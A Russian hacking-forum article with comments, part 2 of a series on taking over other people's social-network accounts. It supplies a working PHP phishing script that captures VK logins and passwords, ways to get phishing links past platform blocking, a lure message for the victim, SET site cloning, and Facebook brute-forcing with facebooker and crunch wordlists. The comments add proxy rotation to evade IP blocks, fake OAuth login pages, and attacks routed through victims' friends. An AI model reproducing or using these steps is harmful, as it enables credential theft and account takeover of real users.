• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Конкурс Получение доступа к аккаунту социальной сети. Ч 2

Статья для участия в конкурсе на codeby.

Приветствую вас дорогие друзья!
Сегодня мы продолжим изучать такую тему как "Получение доступа к аккаунту социальной сети". В прошлой части мы остановились на создании фишинга.

В этой части мы закончим создание нашего фишинг - сайта и приступим к разбору остальных тем которые более интересны.

Что же, а теперь создайте файл logs.php с таким содержимым:
PHP:
<?php
     $login = $_POST['email'];
     $pass = $_POST['pass'];
     $file = fopen("my_pass.txt", 'at');
     fwrite($file,"Login --> $login\nPass --> $pass\n-----\n");
     fclose($file);
     echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://vk.com'></head></html>";
?>

Файл test_fish.html , после того как пользователь введет данные, отправит их в logs.php
Этот файл запишет данные в файл my_pass.txt и перенаправит пользователя обратно на сайт вконтакте. Чтобы создать такой скрипт обратите внимание на атрибут method, а вернее на его значение. В моем случае данные переданы методом post. Также обратите на значение атрибута name. У вконтакте это email и pass. То есть если вы увидите примерно такой код
HTML:
<form method = 'GET' action = 'http://mysite/login.php'>
<label> Login:</label>
<input type = "text" name = "login" />
<label> Password:</label>
<input type = "password" name = "passwd" />
<input type = "button" />
</form>

То начало нашего скрипта logs.php выглядело бы так

PHP:
<?php
    $login = $_GET['login'];
    $pass = $_GET['passwd'];

.....

Наконец мы дошли до финальной части создания фишинга. Осталось закинуть все созданные файлы на хостинг.
В этом вам может помочь программа FileZilla(это на случай если вы любите простые вещи). Название сайта лучше создавать не похожее на название социальной сети. Часто из-за этого некоторые хостинги блокируют ваш фишинг. В итоге мы получаем вот это

Screenshot from 2017-11-02 13-53-50.png

И после ввода некоторых данных убеждаюсь в стабильной работоспособности фишинга

Screenshot from 2017-11-02 13-55-25.png


Практически всегда, если отправить пользователю чисто ссылку на фишинг то социальная сеть заблокирует ссылку. Есть много способов для обхода блокировки, но я для примера опишу вам лишь один.

1. Регистрируем аккаунт в blogger.com(не реклама) --> создаем свой блог.

2. Переходим к пункту Шаблон --> Изменить html.

3. Сократите ссылку на ваш фишинг. Далее добавим следующий код перед тегом <head>
HTML:
<meta content='0; url=сокращенная_ссылка' http-equiv='Refresh'/>

Теперь осталось сохранить.

В конце концов применим социальную инженерию. Здесь как раз таки понадобится информация которую мы собрали ранее. Напишем все той же "жертве" из примера что-то такое:
Привет!
Недавно открыли фанфик. Там Сверхестественное выходит с крутой озвучкой
Держи <ССЫЛКА>

Setoolkit - фреймворк предназначенный для тестирования на проникновение и основанный на социальной инженерии.


На видео я выбрал следующие пункты
Код:
set> 1
set> 2
set:webattak> 3
set:webattak> 2

#Далее вводим имя вашего хоста
#И url сайта который будем клонировать

Остается только сократить ссылку на получившийся фишинг, дать ее "жертве" и мониторить то что выведет set.

Brute Force

Очень сильно уязвим к подбору пароля - facebook. Я создал аккаунт в facebook и оставил много информации. Сегодня мы опираясь на эту информацию попробуем составить базу паролей и применим один старый скрипт для проведения brute force.

Вот внешний вид профиля

Screenshot from 2017-11-02 14-06-14.png

Как я говорил ранее, будем записывать полученную информацию. Первое что бросается в глаза - это имя и фамилия. Смотрим далее и видим этот пост, сразу предполагая род деятельности

Screenshot from 2017-11-02 14-06-27.png


Просмотрев далее я нашел номер телефона пользователя. Проверив его на принадлежность к аккаунту начинаю брутить. Для этого понадобится скрипт facebooker

Распаковываем и далее пишем
Код:
chmod +x facebooker.pl
./facebooker <login> <wordlist>

Screenshot from 2017-11-02 14-14-07.png

Как видим на скрине, спустя некоторое время мы нашли пароль в простенькой базе.

После того как вы собрали информацию и поискав в топ базах не нашли пароля. То можно создать свою базу основываясь на собранной информации. Также в этом вам может помочь crunch. Создание своей базы может отнять уйму времени.

К примеру я создаю базу на пользователя имя которого Саня. Еще я предполагаю что Саня не такой умный и его пароль состоит из его имени и набора цифр. Тогда я получаю следующую команду
Код:
crunch 10 10 -t sanya.%%%% >> baza.txt
Эти 4 цифры могут быть какой-то определенной датой, как раз таки пройдемся по ним.
Повторяюсь, на создание своей базы можно убить очень много времени.

Помните в прошлой части я писал что при общении с "жертвой" мне удалось выудить много информации в числе которой был номер телефона?

Так вот давайте узнаем является ли этот номер логином данной страницы или нет.

Для примера снова вернусь к вконтакте. Переходим по "Забыли пароль"(мобильной версии). Пишем номер который удалось узнать и фамилию пользователя. Если пользователь с такими данными имеется, то ясно дело что номер который мы вводили ранее привязан к данной странице.

Screenshot from 2017-11-02 14-19-50.png


Значит что тот номер который я выудил привязан к странице данного пользователя.
А если не получилось, то постарайтесь узнать нет ли у данного пользователя фейка.
В следующей части закончим тему изучения этого способа.
А на этом часть 2 подошла к концу. До встречи в следующей части.
 

Вложения

  • Screenshot from 2017-11-02 13-52-48.png
    Screenshot from 2017-11-02 13-52-48.png
    2,8 КБ · Просмотры: 583
  • Screenshot from 2017-11-02 14-06-14.png
    Screenshot from 2017-11-02 14-06-14.png
    78,5 КБ · Просмотры: 430
  • Screenshot from 2017-11-02 14-06-27.png
    Screenshot from 2017-11-02 14-06-27.png
    3,1 КБ · Просмотры: 433
  • Screenshot from 2017-11-02 14-14-07.png
    Screenshot from 2017-11-02 14-14-07.png
    23,5 КБ · Просмотры: 409
  • Screenshot from 2017-11-02 14-19-50.png
    Screenshot from 2017-11-02 14-19-50.png
    1,6 КБ · Просмотры: 402
  • Screenshot from 2017-11-02 13-53-50.png
    Screenshot from 2017-11-02 13-53-50.png
    65,6 КБ · Просмотры: 429
  • Screenshot from 2017-11-02 13-55-25.png
    Screenshot from 2017-11-02 13-55-25.png
    3,9 КБ · Просмотры: 458
7

78tyn8!gert

AL04E, подскажи, ты когда брутишь FB, VK или подобные, как обходишь блокировку по ip. Для Windows есть проги, а для Linux так и не нашел, забил. Patator или Hydra можно заставить работать через прокси-лист? Facebooker же не поддерживает прокси-листы?
 

vag4b0nd

Green Team
24.05.2017
303
1 472
BIT
30
AL04E, подскажи, ты когда брутишь FB, VK или подобные, как обходишь блокировку по ip. Для Windows есть проги, а для Linux так и не нашел, забил. Patator или Hydra можно заставить работать через прокси-лист? Facebooker же не поддерживает прокси-листы?

Вподе как hydra поддерживает прокси. А вот насчет прокси листов не имею понятия. Faceboker не подлерживает это да. Я может придумаю что. Отпишу позже))
 
  • Нравится
Реакции: SuPeRtEhNiC и 78tyn8!gert
A

Artem.ser

AL04E, подскажи, ты когда брутишь FB, VK или подобные, как обходишь блокировку по ip. Для Windows есть проги, а для Linux так и не нашел, забил. Patator или Hydra можно заставить работать через прокси-лист? Facebooker же не поддерживает прокси-листы?
В любом случае можно запустить команду через proxychains, указав перед этим цепочку и ее тип в конфиге
 
7

78tyn8!gert

В любом случае можно запустить команду через proxychains, указав перед этим цепочку и ее тип в конфиге
В proxychains нет такого, чтобы заставить работать программу один запрос - один ip и так по списку, есть проксировать трафик через ip или цепочку ip, если ошибаюсь, буду благодарен, тому кто покажет пример.
 
A

Artem.ser

В proxychains нет такого, чтобы заставить работать программу один запрос - один ip и так по списку, есть проксировать трафик через ip или цепочку ip, если ошибаюсь, буду благодарен, тому кто покажет пример.
В принципе можно дописать в исходник цикл по перебору прокси команд из файла, который запрашиваем у пользователя, если он хочет брутить через прокси или еще что-нибудь
 

vag4b0nd

Green Team
24.05.2017
303
1 472
BIT
30
В принципе можно дописать в исходник цикл по перебору прокси команд из файла, который запрашиваем у пользователя, если он хочет брутить через прокси или еще что-нибудь
Вот тебе уже и тема для статьи ;)
 
  • Нравится
Реакции: SuPeRtEhNiC и 78tyn8!gert
J

Jon Gold

Гоу мануал по Evilginx для новичков: от выбора/реги домена до проникновения. Основываться можно на материалах из статьи По-моему, тут зарыт лютый потенциал!
 
Последнее редактирование модератором:
B

Blackout

Я, конечно, опоздал на пару лет, но хочу дополнить. Зачем же делать копию оригинального сайта и пытаться всучить его жертве, если можно сделать абсолютно любой сайт, но с авторизацией нужного нам сайта? Ну например жертва увлекается фото. Значит оно должно знать о самых популярных фотостоках. Соответсвенно берём менее популярный, слизываем полностью главную страницу, подставляем форму входа через фэйсбук например, остальные ссылки на странице делаем реальными, как на оригинальном сайте фотостока(ну или можно и на них сделать форму входа через фейсбук на всякий). И кидаем жертве мол смотри нашёл там крутые фотки, тебе могут быть интересны и можешь ли ты точно так же фотать? Он переходит, его просят зайти через фейс, он логиниться ну и можно сделать перенаправление на реально какие нибудь неплохие фотки. Всё))

Кстати если жертва оказывается, как писали ранее, вся из себя "неперехожу по ссылкам чужим", то сначало ломаем друзей и через них кидаем ссыль)))
 
  • Нравится
Реакции: Vel
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!